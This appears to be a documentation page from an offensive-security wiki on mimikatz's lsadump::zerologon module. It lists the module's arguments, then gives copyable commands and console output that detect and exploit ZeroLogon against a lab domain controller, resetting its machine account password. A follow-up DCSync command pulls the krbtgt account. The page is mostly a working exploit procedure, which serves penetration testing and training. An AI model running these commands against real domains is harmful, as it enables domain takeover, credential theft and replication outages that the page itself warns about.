zerologon
lsadump::zerologon detects and exploits the ZeroLogon vulnerability. It has the following command line arguments:
  • /account: the target DC SamAccountName
  • /target: the target DC FQDN
  • /exploit: proceed with exploitation
  • /null: null session authentication
  • /ntlm: use NTLM authentication
  • /type: The Secure Channel Types. The available values are:
    • Null
    • MsvAp
    • Workstation
    • TrustedDnsDomain
    • TrustedDomainUasServer
    • Server
    • CdcServer
This technique can break the domain's replication services hence leading to massive disruption, running the following "password change" technique is not advised.

Detection

1
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$
2
[rpc] Remote : dc.hacklab.local
3
[rpc] ProtSeq : ncacn_ip_tcp
4
[rpc] AuthnSvc : NONE (0)
5
[rpc] NULL Sess: no
6
​
7
Target : dc.hacklab.local
8
Account: dc$
9
Type : 6 (Server)
10
Mode : detect
11
​
12
Trying to 'authenticate'...
13
=============================================================================================================================================================================================================================================
14
​
15
NetrServerAuthenticate2: 0x00000000
16
​
17
* Authentication: OK -- vulnerable
Copied!

Exploitation

1
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$ /exploit
2
[rpc] Remote : dc.hacklab.local
3
[rpc] ProtSeq : ncacn_ip_tcp
4
[rpc] AuthnSvc : NONE (0)
5
[rpc] NULL Sess: no
6
​
7
Target : dc.hacklab.local
8
Account: dc$
9
Type : 6 (Server)
10
Mode : exploit
11
​
12
Trying to 'authenticate'...
13
=============================================================================================================================================================================================================================================
14
​
15
NetrServerAuthenticate2: 0x00000000
16
NetrServerPasswordSet2: 0x00000000
17
​
18
* Authentication: OK -- vulnerable
19
* Set password : OK -- may be unstable
Copied!
A DCSync can then be conducted with lsadump::dcsync.
1
mimikatz # lsadump::dcsync /domain:HACKLAB.LOCAL /dc:dc.hacklab.local /user:krbtgt /authuser:dc$ /authdomain:HACKLAB /authpassword:"" /authntlm
Copied!
Last modified 6mo ago
Copy link